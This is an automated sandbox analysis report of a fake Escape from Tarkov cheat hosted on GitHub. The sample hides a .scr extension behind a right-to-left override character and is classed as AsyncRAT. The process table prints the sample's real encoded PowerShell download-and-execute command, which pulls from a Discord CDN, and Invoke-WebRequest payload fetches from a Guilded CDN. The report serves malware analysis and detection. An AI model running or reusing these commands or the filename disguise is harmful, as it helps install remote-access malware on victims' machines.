| URL: | https://github.com/supoyev/Escape-from-Tarkov-External-Esp-Aimbot-Cheat/raw/main/escape%20from%20tarkov/Escape%20From%20Tarkov/Escape%20From%20Tarkov%E2%80%AEnls..scr |
| Full analysis: | https://app.any.run/tasks/a9b605da-033e-4a0b-a15d-2414b79b049e |
| Verdict: | Malicious activity |
| Threats: | AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. |
| Analysis date: | November 14, 2023, 12:27:01 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| SHA1: | 3065DA0D35988807C34C98164D35385F846AB1DF |
| SHA256: | 84C8AD42D82A82951A1968C738FC813A83FC5CD6F1C2F446F2960CF21A373E14 |
| SSDEEP: | 3:N8tEdmQVyyvZWYKTsIHTmNIKiAX5KIAqyTZ3OKGgyTZ3OKMzXAkD:2uwAV0QJSO5yV+KGgyV+KMzXAa |
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 684 | C:\Users\admin\AppData\Roaming\4KSDFSFGQ.exe | C:\Users\admin\AppData\Roaming\4KSDFSFGQ.exe | — | taskeng.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: glmf32 Exit code: 0 Version: 10.0.19041.0 | ||||
| 908 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2944.6.1166307407\2065239908" -childID 5 -isForBrowser -prefsHandle 3948 -prefMapHandle 3764 -prefsLen 30252 -prefMapSize 244187 -jsInitHandle 928 -jsInitLen 240908 -parentBuildID 20230710165010 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fd5f542-095a-4fdc-90f6-3ffbe320a778} 2944 "\\.\pipe\gecko-crash-server-pipe.2944" 4124 23505058 tab | C:\Program Files\Mozilla Firefox\firefox.exe | — | firefox.exe |
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Exit code: 0 Version: 115.0.2 | ||||
| 1012 | "cmd" /C C:\Users\admin\AppData\Local\Temp\AmZxIPbzHv.exe | C:\Windows\System32\cmd.exe | — | Escape From Tarkov_nls..scr |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 1036 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2944.5.303903625\353000642" -childID 4 -isForBrowser -prefsHandle 3872 -prefMapHandle 3876 -prefsLen 30252 -prefMapSize 244187 -jsInitHandle 928 -jsInitLen 240908 -parentBuildID 20230710165010 -appDir "C:\Program Files\Mozilla Firefox\browser" - {274876f7-344b-4cbf-abb7-90962b41481b} 2944 "\\.\pipe\gecko-crash-server-pipe.2944" 3860 2045e358 tab | C:\Program Files\Mozilla Firefox\firefox.exe | — | firefox.exe |
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Exit code: 0 Version: 115.0.2 | ||||
| 1172 | C:\Users\admin\AppData\Local\Temp\AmZxIPbzHv.exe | C:\Users\admin\AppData\Local\Temp\AmZxIPbzHv.exe | — | cmd.exe |
User: admin Integrity Level: MEDIUM Description: Exit code: 0 Version: 0.0.0.0 | ||||
| 1728 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2944.1.1054295105\12232237" -parentBuildID 20230710165010 -prefsHandle 1400 -prefMapHandle 1396 -prefsLen 29857 -prefMapSize 244187 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fad5e577-7212-4de1-a941-da67fce30ed0} 2944 "\\.\pipe\gecko-crash-server-pipe.2944" 1412 f8d3b58 socket | C:\Program Files\Mozilla Firefox\firefox.exe | — | firefox.exe |
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Exit code: 0 Version: 115.0.2 | ||||
| 2284 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2944.2.1678943253\2110894171" -childID 1 -isForBrowser -prefsHandle 2060 -prefMapHandle 2056 -prefsLen 25524 -prefMapSize 244187 -jsInitHandle 928 -jsInitLen 240908 -parentBuildID 20230710165010 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c68e68d1-9327-45a1-948d-537b872c7d41} 2944 "\\.\pipe\gecko-crash-server-pipe.2944" 2072 1954db58 tab | C:\Program Files\Mozilla Firefox\firefox.exe | — | firefox.exe |
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Exit code: 0 Version: 115.0.2 | ||||
| 2504 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA2ADAAOQA0ADcAOQAzADIANAAwADIAMgA4ADAAMQAwAC8AMQAxADYANgAwADkANAA5ADAAMAA5ADIANAA3ADgANAA2ADUAMAAvAGUAbABlAGMAaQBpAHAAaQBjAGwALgBlAHgAZQAnACwAIAA8ACMAYQBuAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGYAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AEsAUwBEAEYAUwBGAEcAUQAuAGUAeABlACcAKQApADwAIwBwAHkAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AG4AdgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBuAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANABLAFMARABGAFMARgBHAFEALgBlAHgAZQAnACkAPAAjAGQAbAB3ACMAPgA=" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | AmZxIPbzHv.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
| 2504 | Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
| 2524 | Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2944 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\sessionCheckpoints.json.tmp | binary | |
MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A | SHA256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA | |||
| 2944 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal | binary | |
MD5:DA10AB6E0FF7BC1A0743D17956EDA777 | SHA256:0A73C062173EB31F71E7C6B402D0FFC63F3DDE347CF5C4E1C802ACCEE48ADE2B | |||
| 2944 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\sessionCheckpoints.json | binary | |
MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A | SHA256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA | |||
| 2944 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\cert9.db | binary | |
MD5:B0B49F3D01066118C805EFDA1DAF1CCE | SHA256:FD4792BDE99AD0A5637FC8A49489237591AE111EA635C57B953BD1B1966EEEA1 | |||
| 2944 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\datareporting\glean\db\data.safe.bin | binary | |
MD5:0655A2D1EEF9518AE846BAA4DD9D9FD9 | SHA256:BE530199C7CC6CFD9D6463DC4BFD3717A1BA5D878D03771618C070A8620B3B33 | |||
| 2944 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\datareporting\glean\db\data.safe.tmp | binary | |
MD5:0655A2D1EEF9518AE846BAA4DD9D9FD9 | SHA256:BE530199C7CC6CFD9D6463DC4BFD3717A1BA5D878D03771618C070A8620B3B33 | |||
| 2944 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\cert9.db-journal | binary | |
MD5:1F080B9298696D1F4DF95628B5CC81E3 | SHA256:A264A33CDFB9673D1F1F84A415236627D38E0DE3DD3343D235B606F8C10A8608 | |||
| 2944 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm | binary | |
MD5:B7C14EC6110FA820CA6B65F5AEC85911 | SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB | |||
| 2944 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\datareporting\glean\tmp\c4656ae3-bbf7-484d-98dc-63d9104c56b6 | text | |
MD5:174A9B86CFAA43C8DC08E10FCAD10CFF | SHA256:6FFD691D925FC58C0D4D150CB2DA033C28A0E3722D6BF10ED2CCF76CB0425842 | |||
| 2944 | firefox.exe | C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\nltxvmn2.default\startupCache\urlCache-current.bin | binary | |
MD5:4DF9B77C7650AF87B264E535779AE2A4 | SHA256:C57071FCFEF26EE4F08A2029E547848EC015B10045ABAD705195A9F966FEAE58 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2944 | firefox.exe | GET | 200 | 34.107.221.82:80 | http://detectportal.firefox.com/success.txt?ipv4 | unknown | text | 8 b | unknown |
2944 | firefox.exe | GET | 304 | 2.22.61.59:80 | http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip | unknown | — | — | unknown |
2944 | firefox.exe | GET | 200 | 34.107.221.82:80 | http://detectportal.firefox.com/canonical.html | unknown | text | 90 b | unknown |
2944 | firefox.exe | POST | 200 | 142.250.185.131:80 | http://ocsp.pki.goog/gts1c3 | unknown | binary | 472 b | unknown |
2944 | firefox.exe | POST | 200 | 2.16.202.121:80 | http://r3.o.lencr.org/ | unknown | binary | 503 b | unknown |
2944 | firefox.exe | POST | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/ | unknown | binary | 313 b | unknown |
2944 | firefox.exe | POST | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/ | unknown | binary | 471 b | unknown |
2944 | firefox.exe | POST | 200 | 142.250.185.131:80 | http://ocsp.pki.goog/gts1c3 | unknown | binary | 472 b | unknown |
2944 | firefox.exe | POST | 200 | 142.250.185.131:80 | http://ocsp.pki.goog/gts1c3 | unknown | binary | 472 b | unknown |
2944 | firefox.exe | POST | 200 | 2.16.202.121:80 | http://r3.o.lencr.org/ | unknown | binary | 503 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
324 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
1956 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
2944 | firefox.exe | 140.82.121.4:443 | github.com | GITHUB | US | unknown |
2944 | firefox.exe | 34.107.221.82:80 | detectportal.firefox.com | GOOGLE | US | whitelisted |
2944 | firefox.exe | 34.117.237.239:443 | contile.services.mozilla.com | GOOGLE-CLOUD-PLATFORM | US | unknown |
2944 | firefox.exe | 142.250.186.170:443 | safebrowsing.googleapis.com | — | — | whitelisted |
2944 | firefox.exe | 18.235.78.81:443 | spocs.getpocket.com | AMAZON-AES | US | unknown |
2944 | firefox.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
github.com |
| shared |
detectportal.firefox.com |
| whitelisted |
prod.detectportal.prod.cloudops.mozgcp.net |
| whitelisted |
contile.services.mozilla.com |
| whitelisted |
example.org |
| whitelisted |
ipv4only.arpa |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
spocs.getpocket.com |
| shared |
proxyserverecs-1736642167.us-east-1.elb.amazonaws.com |
| shared |
fp2e7a.wpc.phicdn.net |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
3552 | Escape From Tarkov_nls..scr | Potentially Bad Traffic | ET INFO Pastebin-style Service (textbin .net in TLS SNI) |
324 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discordapp .com) |
3552 | Escape From Tarkov_nls..scr | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI) |
3552 | Escape From Tarkov_nls..scr | Potentially Bad Traffic | ET INFO Pastebin-style Service (textbin .net in TLS SNI) |
3552 | Escape From Tarkov_nls..scr | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI) |
3552 | Escape From Tarkov_nls..scr | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI) |
3552 | Escape From Tarkov_nls..scr | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI) |
3552 | Escape From Tarkov_nls..scr | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI) |
3552 | Escape From Tarkov_nls..scr | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI) |
3552 | Escape From Tarkov_nls..scr | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI) |